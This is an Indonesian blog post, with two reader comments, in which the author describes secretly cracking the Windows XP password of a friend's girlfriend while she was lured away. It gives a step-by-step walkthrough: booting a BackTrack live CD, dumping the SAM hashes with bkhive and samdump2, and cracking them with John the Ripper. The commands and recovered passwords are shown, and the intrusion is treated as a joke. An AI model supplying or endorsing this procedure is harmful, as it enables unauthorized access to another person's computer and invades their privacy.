Friday, July 18, 2008

tiPs cara menGambil passWord AdmiN winDows XP

hmm,,,3 hari yang lalu ( tepatnya hari rabu ) ada yang minta ke saya lewat pidgin ( Yahoo Messenger kalau di Windows ) untuk ngebobol password admin punya ceweknya.. weleh,,weleh,,,cowoknya sendiri kok ga tau password admin pujaan hatinya,,ckckckck,,ada apa-apanya nih..
tadinya saya ga mau tapi karena dia teman baik saya dan dia mintanya memelas bgt ya sudah,,akhirnya saya pun menerima nya..

Hari Kamis, 17 July 2008 jam 08.00 AM
temen saya menelpon untuk ketemuan dengan mereka ( dia dan ceweknya ) di plaza semanggi.
Kamis, 17 July 2008 jam 11.00 AM
kami pun bertemu dan dengan akting temen saya,,,saya pun dipinjamkan laptop tuh ce dan temen saya ngajak ceweknya pergi sehingga saya bisa beraksi. Langsung saya rogoh2 kantong celana saya dan ASTAGA!!!!!!!!saya lupa bawa USB saya yg berisi ophcrack. DAMN!! tapi saya langsung inget kalau setiap hari di tas saya yg lucu ( weqs,,) selalu ada live cd backtrack 2..heheheheh,,,senjata pemungkas saya nih.. ok,,,ini langkah2nya :
1. Nyalakan laptop nya,,kebetulan laptop nih ce adalah compaq jadi pencet F10 buat masuk BIOS ( oh iya,beragam2
lo,,ada yang pencet DEL ),,lalu first bootingnya buat dari CD. ( laptop/PC jaman sekarang biasanya uda bisa
booting dari CD.
2. Ok,,,masukkan live cd backtrack dan tunggu ampe masuk CLI ( Command Line Interface ), masukkan username dan
password yang disuruh
3. ok,,lalu masuk ke GUI ( Graphical User Interface ) dengan ketik :
bt ~# startx

( sebenernya sih kalau buat cari password ga usah ampe masuk GUI,tapi banyak orang yg ga suka mode CLI, jadi
terserah kalian )
4. Seperti yang kita ketahui bahwa Windows menyimpan passwordnya di file /WINDOWS/system32/config/sam.
ketik seperti ini :

bt ~# mount
keluarannya :
tmpfs on / type tmpfs (rw)
proc on /proc type proc (rw)
sysfs on /sys type sysfs (rw)
usbfs on /proc/bus/usb type usbfs (rw,devgid=10,devmode=0666)
/dev/hda1 on /mnt/hda1 type NTFS (ro,noatime)

( lihat yg di tebalin,,yak NTFS adalah partisi windows dimana letaknya di /mnt/hda1 )
n.b : jenis harddisk ada yang sda dan hda, jadi bisa jadi hasilnya saya dan anda berbeda. Saya : mnt/hda1,
Anda : mungkin saja /mnt/sdax ( x diganti dengan angka partisi windows anda )
5. nah,,untuk membuktikan kalau kita bisa mengakses tuh direktory windows,,ketik :

bt ~# ls -l /mnt/hda1/WINDOWA/system32/config/sam ( ENTER )
-r---- l root 262144 July 17 11:10 /mnt/hda1/WINDOWS/system32/config/sam
yess,,,saya berarti bisa mengakses file di dalam partisi windows.. Asikk,,sedikit perjalanan
lagi.
lalu saya minum milkshake dulu yang tadi dipesenin teman saya tanpa sepengetahuan g..ckckcckk..lanjut
6. Langkah selanjutnya adalah mendapatkan Syskey yg disimpen di /mnt/hda1/WINDOWS/system32/system yang bisa
di dapat dengan bkhive. Ok,,ketik :

bt ~# bkhive /mnt/hda1/WINDOWS/system32/config/system my_syskey
Bkhive ncuomo@studenti.unina.it
Bootkey: 5e5f1519533b1ee4dadb39e7f6cffb0f
bt ~# ls -l
total 5
drwx---r-x 2 root root 4096 Jul 19 10:51 Desktop/
-rw-r--r-- 1 root root 323 May 2 2005 Set\ IP\ address
-rw-r--r-- 1 root root 16 Jul 17 11:12 my_syskey
drwxr-xr-x 2 root root 4096 Mar 6 2007 sample_scripts/

7. Selanjutnya, kita akan mengambil password yg telah teerenkrypsi ( hash ) pada sam dengan samdump2.
ketik :

bt ~# samdump2 /mnt/hda1/WINDOWS/system32/config/sam my_syskey
Samdump2 ncuomo@studenti.unina.it
This Product is includes cryptographic software blablabla ( perkenalan )sampe ada tulisan kyk gini

Administrator:500:aad3b435b5144eeaad3b435b1404ee::::
No password for user Administrator(500)
Guest:501:aad3b435b5140eeaad3b435b51404ee::::
.
. ( diperpendek sampai ada gini )
Cantik_Imut:1003:01fc5a..................................................3524::: ( dipersingkat )
Sayangku:1004:e52cac.....................................................cc61:::

8. hehehe,,ternyata ada 2 account nih,,sep2...lalu saya pesen personal pizza yang eggsunshine ( kalau ga salah)
laper euyyy...setelah memesan saya langsung melanjutkan.
nah,,kita jalankan lagi samdump2 dan menyimpan hasilnya di my_hash.txt dengan memakai tanda ">" ( tanpa kutip)
gini nih kalau ga jelas,,ketik :

bt ~# samdump2 /mnt/hda1/WINDOWS/system32/config/sam my_syskey >
my_hash.txt

bt ~# ls -l
total 9
drwx---r-x 2 root root 4096 Jul 19 10:51 Desktop/
-rw-r--r-- 1 root root 323 May 2 2005 Set\ IP\ address
-rw-r--r-- 1 root root 482 Jul 17 11:13 my_hash.txt
-rw-r--r-- 1 root root 16 Jul 17 11:12 my_syskey
drwxr-xr-x 2 root root 4096 Mar 6 2007 sample_scripts/

Nah,,uda kesimpen deh yg tadi panjang itu ( Cantik_Imut:blablabla ) ke my_hash.txt
9. Duh,,pizzanya belum datang nih,,weits,,,hp saya bergetar,,ternyata dari temen saya..heheh,,ga sabar dia.
abis itu,,saatnya JTR ( John The Ripper ) beraksi ( this my favorite ) JTR bisa dilihat di http://
www.openwall.com/John
Di backtrack Program password Cracking John ada di direktory /pentest/password/John-1.7.2/run/
10. Ketik :

bt ~# /pentest/password/John-1.7.1/run/John my_hash.txt
Loaded 9 password hashes with no different salts ( NT LM DES [32/32 BS])
blablabla ( ga usah ditulis kali ya keluarannya )

selamat,,,passwordnya udah anda dapatkan )
11. Akhirnya pizza datang. Oh iy,,untuk memudahkan melihat password ketik :

bt ~# /pentest/password/John-1.7.2/run/John --show my_hash.txt
keluarannya
Cantik_Imut:keluarga_bahagia:balablaal ( ga penting buat ditulis kelanjutannya )
Sayangku:beruang_kutub:blablablaa..
dapat dilihat bahwa ID: Sayangku passnya: Beruang_kutub

12. sep,,saya telpon teman saya dan saya kasi passwordnya,,,wew,,seneng sekali mukanya..

hahahhaa...
ok,,cara ini saya buat se rinci mungkin supaya dapat dipahami..
terimakasih..
thanx for Remote-Exploit untuk menciptakan backtrack
thanx for S'to atas pekerjaan indahnya.

2 comments:

Anonymous said...

Pusing bacanya, ribet banget. Softwarenya download dmn sih... ada cara lihat password administrator yang lebih ringkes ga...

Blog Writer said...

duh pusing juga bacanya terlalu rinci kali ya hehehe tapi mantap lah, aku bookmark dulu sitemu ini biar kl perlu bisa langsung action

awas kl ntar gw ga bisa ya (nah lho)